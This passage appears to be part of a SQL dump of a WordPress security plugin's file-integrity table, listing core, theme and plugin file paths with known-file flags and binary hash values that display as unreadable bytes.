5D�_�\'-�w','',0,'?'),('�,>!�:e���[\"','wp-content/plugins/redirection/models/log/log-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��{t��|,Y�su(','B�V�OOP�#?�i���v�8�V�e\\{�-���','',0,'?'),('�5��;T��]��\0�”','wp-includes/blocks/post-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9]��\Z����w','\"k[s@��w3l���=߭yS4��z���/Լ','',0,'?'),('�6�|;�;8�Q�4�k��','wp-admin/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�V��=P ��)p8','M�ƒ�զ����9҂���J0H��8/�uu�u��)','',0,'?'),('�9�e�E��bݾl�3�','wp-includes/js/wp-lists.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\ׅ�Cs��j&\Z6','����b���>�r���KT:��К�\r','',0,'?'),('�R��x�ȱ�\Z��<^','wp-includes/wp-includes/js/dist/nux.js',0,'ꁥ�قH6K�&�x7��','ꁥ�قH6K�&�x7��','-p� C��5s����5��s\"�^�C�����8','',0,'?'),('�h$b��ޗ!��`u�d','wp-content/plugins/wp-smushit/app/views/dashboard/webp/meta-box-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Oy��R�J�–��','���O��c8l9=��h�V��R��/��3','',0,'?'),('�s�6Z��$Ӿy��D(','wp-includes/blocks/group/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=>���*��f��[���','ϩ���z��J&�O{|K�^�֤�0.�1t','',0,'?'),('�z9�	�`�d3�\0�Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �@��^����8J','��ؽ�@��B-K���m���-Ȼ��\Z�2p','',0,'?'),('��C�2D��~�M��lW','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��͝0�A�b� ��<��','�hG	�F����;�����n�|��\"�j','',0,'?'),('��\Z5o��#R\'/��l','wp-includes/fonts/dashicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N\Z>w���@�R-/Y�','B\nZ\Z��_p�n͂��Q?/�\r3s�}���)','',0,'?'),('�����O����m7��','wp-includes/wp-includes/images/crystal/license.txt',0,'�]�Lc�iG�fQ�\r��','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('���{�RDC�~�����','wp-content/plugins/redirection/redirection.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Y|��c������','���o�;�Q�#�*�S��{Í�\09�6�ǽ','',0,'?'),('����E�?��Юᾠ','wp-includes/js/media-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�r��u�%�N���2','R�8k{�B�:4���\Z>���w�c9','',0,'?'),('� �v����bu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�r����]��/�','yus���Կ�����:�\0)�y�zs�ݿSkH�','',0,'?'),('��+iW�{hj�>\r�','wp-content/plugins/wp-smushit/core/modules/class-resize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','绁�\"�lg��8���','�\r_�IY�޾j�oa��X�	 �Vij�Qo8<�','',0,'?'),('���R:^�e+x2��c','wp-includes/PHPMailer/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�rN���y�qD��','��F\0O8�z��K@\Z+q�xn�|^�W�p�N�','',0,'?'),('��Y\Zx�[k2��d','wp-content/plugins/wordpress-seo/src/conditionals/third-party/w3-total-cache-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X҂���_�HSkH�h','�]�c!���Pa��yc�`�΍)�G�Qb\'A\r��','',0,'?'),('�ש��D��E��i_�','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-already-installed-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_?j�h���L���F�','q+�J�@�v^h&�vֆ�7��ve�����4�','',0,'?'),('��WD�$7��w3��S��','wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-activated-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ը�.�&�D���','�\0{�\ZY�$��\"7%z��9�㟧��l!�','',0,'?'),('��=���?;�~7S�Q\Z','wp-includes/blocks/comment-author-name.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�ͻ�f1�T�qT�}','�b��\"���g�ZQڲ�P�V��t��','',0,'?'),('��Cg����}|�E��','wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)�\r�]�X0�h5�\n�','�\\DE����lV�����Hk��\\N�A3���','',0,'?'),('��Z^󻰗�C̫O�','wp-content/plugins/wp-cerber/assets/flags/kp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L^��ᙝ��6�e�~',';]vݸ0�&����#P�љ`��@mq','',0,'?'),('�����/_���H�y','wp-content/plugins/wordpress-seo/src/schema-templates/cooking-time.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��\\�O�Ʌz8N','Pm������{S�;bkጄ��_��΍����e','',0,'?'),('�i���hʖ�s�K','wp-content/themes/twentytwentythree/parts/post-meta.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','83��ډ5]&��q�Y','�|�M��\r�ރB�X�?q����[���$�}','',0,'?'),('��u�E�z���#d��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/MultipartStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4`RĨf��w��	','.��Fߪ��$	�Mr,/��6�j�g\r@K�`�','',0,'?'),('�	v�O.�|ߤҵ�','wp-includes/js/tinymce/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�����x:�`����','Y��#wO�g^\'�b��:�^�	=跨|��','',0,'?'),('�	ļ\0@�)���J','wp-content/themes/hitmag/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�PS�\'��Z5�Z}��','���qa#T0��T�n=���8X\n�Bg%΀L�','',0,'?'),('�L<Q��(��_g ��','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ResettableContainerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e).7:�4�]7�]�\"J�','��N�����qbG�x�<�B��\'\n}�Z���','',0,'?'),('�!�M��TP��c� SO','wp-includes/wp-includes/images/uploader-icons.png',0,'��\\M�����m��','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('�;9�49����**3���','wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php',0,'~���f%�(��xfn3','~���f%�(��xfn3','��0ſ���Y�~�YǦ�����m','',0,'?'),('�>ܢ�Ӱ�\Z1���=C�','wp-content/plugins/wordpress-seo/src/presenters/canonical-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�c�P�̍�zFx�','�UХ�W���_>s�1��9za��c��>','',0,'?'),('�C�Q%��@	�Ja �','wp-includes/blocks/archives/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�՜VH����Zf��','4!\0�}!�;9o�l�_�l�4��f��L��V�l','',0,'?'),('�Lߨ�Ϥ�(��R�','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gq���i�s�픋-','�~:\"�`�he&@��*����A�����','',0,'?'),('�jHE�4��5�wn','wp-content/plugins/wordpress-seo/src/generators/open-graph-locale-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l�-Ys+o','�?�#�	��.c4�Sסo��5!�jgt�|\\\\�','',0,'?'),('�k�|DD��*@4�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nAgv��1P�ص','����0o*\r��vA�o�3���:��j�u���y','',0,'?'),('���5W��k�^�.�','wp-content/plugins/wordpress-seo/js/dist/admin-global.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��Q��ɾ#��f','����OG�*�����JX�2�ԧ�2\n�`�G5�','',0,'?'),('���l�hm��fsa�\Z','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/ProviderRedirectTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�R,^c�\rd�n��V�','_��?��\0z~���A���A��2Q,����Z��','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ی��IV�f57�','���Kj��)��&�⍡����l�^��k�','',0,'?'),('��t�c�8�8���d@}','wp-content/themes/twentytwentythree/styles/pitch.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?l<.8>Yoݩ͒\0','eB��HW��\'�\\nd���z���F�*��P','',0,'?'),('���`e�>�s�ਝ�','wp-includes/wp-includes/images/smilies/icon_arrow.gif',0,' 	�J<�g��o�9:x',' 	�J<�g��o�9:x','�n�c���x0�ĥ���t��N���޾Y2X\0!','',0,'?'),('������L���U�2u�','wp-content/plugins/wordpress-seo/src/deprecated/admin/endpoints/class-endpoint-ryte.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�G�`��v��31%','�1j����\0Hϳ�jd[�(��� �x`y���','',0,'?'),('��T1��Г�����','wp-content/plugins/wordpress-seo/src/integrations/admin/link-count-columns-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(ŸI�lG9J���U�m','� ��O��!������N��/O�۩	�Ǹ�','',0,'?'),('������n������','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�~]r�M�ͪ(vu','Yz�Ж�4�/h^DϚ���� �؞�@��&','',0,'?'),('���!���Ow鏆','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sr-Cyrl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=2U:���\nz8zuh','_2����<U�YYu\"RKV��aʩO�u�S3@','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hͺ/�ME�߾_؀C2','?�ε^d���{)iҲ߼U�;�,=5��A��T','',0,'?'),('���al�V�?�f�\Zё�','wp-includes/IXR/class-IXR-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d߹��$c�9�','\0�{M��U�\rN.�)���-����`wH���','',0,'?'),('�\0h�Kf��\0�','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e�����','0��Q7018�ު9-�z9ؽq��SrĒ�P��','',0,'?'),('�W;{�w_*#��=*','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php',0,'*:Uț�J>��h�z','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('����Ž��H�06�','wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ž�K\\�b�$�F','&$�ĉ9����~_SH�_�̓�%L���\'&�','',0,'?'),('�f�c�����}^�E�','wp-content/plugins/wp-cerber/assets/flags/gr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eP��p*�\Z�i�H','/.�II��>\'�\0��#w|=ae׫�!����K���','',0,'?'),('����8(\Z�j�Z]}','wp-includes/js/jquery/ui/effect-pulsate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ީ�2�}\'�YԈH\0�','KD�ڊ�����f����D�b$*\Zw�u��pB','',0,'?'),('�k��מˊ\'���&�_','wp-content/plugins/wordpress-seo/admin/class-yoast-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Sxr�;�����t�N','��S���O�R�2A���_��^[zF�;:y','',0,'?'),('� ;P��6��37PUF�','wp-includes/blocks/comment-content/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tfg}�ȅ��A��P','�����2��Ш!H`a��]Uq��\Z[}','',0,'?'),('�!-������B�ع','wp-content/plugins/wp-fastest-cache/templates/update_success.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�z��9v��','Ϧ�J/$\".*9�&Œ��� Z���B�u��g{','',0,'?'),('�%6���7�l9R�9�','wp-content/themes/hitmag/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z������� 6�>','��@⣂�L�EQ��(�ie��q[N|&���Ð�','',0,'?'),('�.�u�7��!:+��J','wp-content/themes/hitmag/inc/kirki/controls/js/script.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�ʍ��U��j��M','���t��\\l+�L_c�hj�?�$pԸbU�','',0,'?'),('�U�S�\rB��c>\r�','wp-includes/blocks/latest-comments/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XV�e�Y�2yɑ#�','�	L�l���\0�ū���l�S�^65jz�u','',0,'?'),('�WM��@f�r��\Z','wp-content/plugins/wp-smushit/app/assets/images/hero@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+������9��|D','����&��\r+gh<�} �����ּg�l','',0,'?'),('�X�R�ev�� O��U','wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\Z�s�h<���	','�����\0\n��[>��`fC�i/�hw���vM�','',0,'?'),('�X����g5��(�=c','wp-includes/js/tinymce/skins/lightgray/img/trans.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('�\\fE�\no�����GT','wp-content/plugins/wordpress-seo/src/helpers/indexable-to-postmeta-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���7V\n9m�A��','nט�2���$�Bn��j��s��4\0�ϋ','',0,'?'),('�g��d��з��nX','wp-includes/rest-api/endpoints/class-wp-rest-block-patterns-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~p�p<�ӈ','�hm�?RnCMs�[�:����Ƥo���\"2x�\Z','',0,'?'),('�pt_ Y����7L�Kt','wp-admin/css/deprecated-media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H����\r�W��C�','�U=E�\"=��a�w�f\Zͬ9�8m��Fˏ��V��','',0,'?'),('�y�!ޓ��\\�T+','wp-content/plugins/wordfence/css/wordfenceBox.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('��]�„[���\r���','wp-content/plugins/wordpress-seo/src/config/migrations/20191011111109_WpYoastIndexableHierarchy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!IQ՟���]k�ĉ�i','ʬ׺&�@��\n�OEl������Y���','',0,'?'),('��l?]�Z�jKY�','wp-content/plugins/wordpress-seo/src/presenters/open-graph/locale-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���]`��b)Č�','NJH�bQ#��E$���5*8����xZ�s�!�','',0,'?'),('��.��9��q��+�oA','wp-content/plugins/redirection/locale/json/redirection-it_IT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÇE\\�9���x��ڬ','�z���\0[5iǟFX{_��I��`��M��F','',0,'?'),('����T��D��F�K1�','wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<=�ؒ��M%�','�.��D�q��l��7Y0z[�^y+��\'���	','',0,'?'),('���5<�\rd7��w��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ro.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{r0<܂�aU�d�','�0���i�߻� �E\Z���i���=9.a[0� �','',0,'?'),('���N��.�c���	]`','wp-content/plugins/wordpress-seo/src/actions/indexing/indexation-action-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꍺ�<٩S�HQO��','&��4Dք��P�\"����w?��\r��2q�','',0,'?'),('��/GΞӶ[�ǜ��C','wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C*���?�4�k��&-s','�v2�UW�n�4V�[an�*�?����X��','',0,'?'),('�ˢO�:����Oǵ�','wp-content/plugins/wp-fastest-cache/templates/sample_img_list.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⤜*a��,bI�9�_','�h�R\\D�%@�^�HI�\\.��.K�J�0��','',0,'?'),('���n�1�u`z�@ң�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_CH.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W����������Sۨ��','M4#\\���g�ZK��2���=�Y��h\'�\\','',0,'?'),('���[�/�9}�`:w�P','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UT{C�ɷ�!�-�Q9�','5���WJy��\"�E�><�GE�;��=��X��\n\n�f','',0,'?'),('��v���K:�ZF','wp-includes/blocks/site-tagline/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�F��هs�[�mH�','��B\n×�ȹF)|6=�9G���>��n�`�u\Z','',0,'?'),('���7�%�̬���&�','wp-includes/css/dist/block-library/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\0��9(�~Vb�\r','x�|ؤ��h�G5um~.Hu����[�(4D','',0,'?'),('��Z%7��������','wp-includes/wp-includes/js/dist/date.min.js',0,';�̆H;M�6ɻj�',';�̆H;M�6ɻj�','w��y��D���~�`,�SM�\0�4+�MA','',0,'?'),('��en\'��LBvj�\r','wp-content/plugins/wordpress-seo/src/integrations/third-party/bbpress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q7�$��Pv��K(7m','�z��)y���JV����g{ٱxC�\"vFndPX','',0,'?'),('�\0�����.}�fwA','wp-includes/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͽ�Na�e����\\�E','��CR�H��<f�T�|�Ϫ�/\"�Φ�h$','',0,'?'),('�\r��%�A}�* ��V','wp-content/plugins/wordpress-seo/src/helpers/schema/replace-vars-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�g�fL.�1��[9','T��IM�a��{n�B��=k�ꂞP��=�Jh','',0,'?'),('��^:\Z�X^�K;ȣ �','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z9��3\"�\\X{uvb ','7=�%�\r�3�gw��lvN�c�팽w�--N','',0,'?'),('��ᨩ���`����+','wp-content/plugins/wp-cerber/assets/flags/nf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���O[Z��֕9�','�t��.�_(jcWTN�ΰ���}/�Բx�','',0,'?'),('�*���#…w�6�%�*','wp-content/plugins/wp-smushit/_src/scss/modules/_directory-smush.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƁU���fjx�','�+;}�5�3�a91ދ��8�K{V��n.3�','',0,'?'),('�?TEb�V+�#闓HC','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/LogicException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%�.v��!�{�9','>-�q;�v�3��R�ј��u�A�Ir,��8�^','',0,'?'),('�J��S�h+.|�','wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js',0,'-��ZC�l­}�莐�','-��ZC�l­}�莐�','y��T��Nz+����⃆��\'��%Y�','',0,'?'),('�N\n�i�{Z΂���J*','wp-includes/wp-includes/js/customize-models.js',0,'�\'�~G~�Ԟ�','�\'�~G~�Ԟ�','�h�3XVx�p��T��OS‘Sfb��\r�E捵�','',0,'?'),('�[���QH\"pS1Ȫ�c','wp-admin/images/arrows-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� Q�}��ydb#6�','�,c�˿\Z�i(~���)����\'��8[A�/�I��x','',0,'?'),('�\\�l/�S��	��ʨ�z','wp-includes/blocks/template-part/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U{�9��eMz+d�z&e2','�ip��=] �,Ǟ8a�kt���r�__h�>','',0,'?'),('�k���j���r-�|%','wp-content/plugins/redirection/models/redirect/redirect-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fU4��zV���\rS:','J�����m���?��-@�j�)�T���d','',0,'?'),('��^r ��_y)�\'w�]','wp-includes/wp-includes/js/jquery/ui/progressbar.js',0,'N��=i�D��_zy�\r3','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��EV�-�,̛�3��`','wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php',0,'�uZ���7ѳ����U','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('��[ixT�q��~Wv�e','wp-admin/network/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8@_vaє͓N�|�j�','<�	�gK�K�Ԇ�{�ȑn�V��U�̉\n�2�','',0,'?'),('��F~���y�c7v-','wp-includes/js/customize-preview-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','im�����s[�x��','����U�T&ڬ�V��a������XǍ&a','',0,'?'),('�䑖�w�7:\'�h*','wp-includes/js/dist/vendor/lodash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C`�]1~������','׳[�p:�	�z���K�QWw�t}H��I�(	�','',0,'?'),('��G�Gn���I�+R?','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��5�\\>�V6̐�','�^��?��G�ۥ��=J�~7ٽ�⮞�&�','',0,'?'),('��i�%���o�)�#��\\','wp-includes/blocks/image/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r|7��j���@¡�','�8}��F�f�H��v��=�Dw��eA����9','',0,'?'),('���2���:�����','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('�2s�X+CZJ�L�,','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�GA��<�x7^^�j.','ѢV��t�`�0�䃕�����9hj~��9y','',0,'?'),('�M�}�n�\"4jd�R��','wp-includes/blocks/post-template/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�����M�}\\�','K�.�c�~�������[&\'��1�S�S���','',0,'?'),('���f����蔷�+��','wp-content/plugins/wp-smushit/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��w��]�����','!���c�ةD�9\nW\nJ��6��\no(Rt��\ZI','',0,'?'),('�\Z-��x7�(A�4���','wp-includes/js/swfupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�\"���lj͘�F�;,','wp-content/plugins/wordpress-seo/src/integrations/watchers/option-titles-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��`���FW%l�','��F���IVQŁ�UfP���\Z\n�CNFT','',0,'?'),('�,:���3�չ�C@�~�','wp-content/plugins/wordfence/modules/login-security/classes/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�a�b�vr�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�1W;c�����N�\"�u','wp-includes/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Nf��y��W�','�Z�g����B}��\n�+{�\rN�T|l�!F��','',0,'?'),('�5$���p�#�e','wp-includes/wp-includes/images/smilies/icon_razz.gif',0,'9[�w���D�AM�A�','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('�J��B�GT�;,l��T','wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%�	��#���#�5','',0,'?'),('�O�-DK��tkE�j','wp-includes/wp-includes/embed.php',0,'V\Z���/}ͳYM=��','V\Z���/}ͳYM=��','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�P�]�?T�}�A¿','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��C]]!X�x���','�N�ȣ�F3ôP\'\Z�j��h�|�W��O��','',0,'?'),('�V�^�3��m6�._P','wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��挷[��^�7,','lxE&�35̅��Nj����!%Ƹ��v��','',0,'?'),('�Y�3�iQ�a����p�','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/QRCode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yc��>��\r\0��}�','M�����V�|��G��C����{컐�;�','',0,'?'),('�q2t�rۗ,]s*r�','wp-includes/blocks/audio/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b���W���4�5�Zy�','>xj$a�|���R��\\:��0�ɬ��3�O[B','',0,'?'),('��.�.yÜ��w�$','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-dimension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\n�{xakf�S��i)�','Z�mda��!�b$@K:*�Db1q���K�+7','',0,'?'),('��iE��ͷ�ӏ��','wp-content/plugins/redirection/locale/json/redirection-es_CO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$\"a��l3؝J�eY�','z��ܧ��<��IO�N��\0܌�͇��& ]��','',0,'?'),('��i���Z/&�J8|�','wp-includes/wp-includes/js/dist/token-list.js',0,'�r�o��\Z�����#','�r�o��\Z�����#','r�����a����D����*�Q�R��4A�','',0,'?'),('���P/\0]�{xjh','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-radio-buttonset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tފ�?��\08�\Z���[','�a�^��`P�\n��a��児�\Z�t�wp3','',0,'?'),('���Y`���FΘ�,�','wp-includes/wp-includes/template-loader.php',0,'�z�	ҿ��܌~���','�z�	ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�����[���D?_�[�','wp-includes/random_compat/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�?�Mx����l|�','�B�S\ZBeLƓ3�#ھ��b�j52=�<P�3v�','',0,'?'),('���7�M3š�$��','wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('����2@�k�w>K�2','wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�:0���w�ʏ','��>�g�H�������:��׎��L3?w=�','',0,'?'),('����H\0ۙ��h�C��','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6����\"�֢]v�I',';~\r����N��l�$�����ҿ���S!�l�','',0,'?'),('�����ɀQ�Ŋ','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2b�­�KJ��L��?','�ZHTc�& .f�z���JA5T�s�ɷ�=�~�','',0,'?'),('��wt�H���-s�\0�n','wp-includes/js/wplink.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!{�TW�V����','�@e�{F� 